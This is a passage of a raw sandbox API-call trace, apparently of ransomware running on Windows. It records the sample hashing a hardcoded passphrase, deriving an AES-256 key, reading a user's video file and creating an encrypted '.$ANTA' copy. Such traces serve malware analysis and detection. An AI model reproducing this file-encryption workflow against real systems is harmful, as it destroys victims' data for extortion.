lpsz="__CRYPT_CONTEXT") returned 0xf [0100.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0100.746] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e2c8 | out: phHash=0x144e2c8) returned 1 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0100.746] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0100.746] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca940, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0100.746] CryptHashData (hHash=0x41ac280, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0100.747] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.747] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0100.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca9e8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0100.747] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac280, dwFlags=0x1, phKey=0x144e2c8 | out: phKey=0x144e2c8*=0x41ac200) returned 1 [0100.747] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0100.747] CryptDestroyHash (hHash=0x41ac280) returned 1 [0100.747] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\0l3d58qA0oi.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\0l3d58qa0oi.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0100.747] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.747] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea00 | out: lpNewFilePointer=0x0) returned 1 [0100.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0100.748] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0100.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7e48 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e400 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e4f0 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0100.749] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx")) returned 0x10 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0100.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0100.749] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\0l3d58qA0oi.mp4.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\0l3d58qa0oi.mp4.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0100.750] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0100.750] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0100.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e04020 [0100.753] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea50 | out: lpNewFilePointer=0x0) returned 1 [0100.753] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ea78*=0xb24b, lpOverlapped=0x0) returned 1 [0100.754] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ea78*=0x0, lpOverlapped=0x0) returned 1 [0100.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0100.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0100.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0100.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0100.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb24b) returned 0x4516010 [0100.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e04020 | out: hHeap=0x1780000) returned 1 [0100.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0100.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0100.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0100.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb24b) returned 0x4521268 [0100.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0100.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0100.758] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0100.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0100.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0100.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0100.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0100.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb24b) returned 0x4516010 [0100.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0100.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0100.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0100.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0100.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0100.758] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0100.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0100.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0100.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0100.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0100.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0100.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0100.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0100.758] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0100.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0100.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0100.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0100.758] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0100.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0100.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2780 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb24b) returned 0x4516010 [0100.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0100.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2910 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0100.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0100.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca400 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0100.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb24b) returned 0x452c4c0 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0100.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0100.760] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0100.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0100.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0100.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0100.761] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0100.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0100.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0100.761] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0100.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0100.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2790 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0100.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0100.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 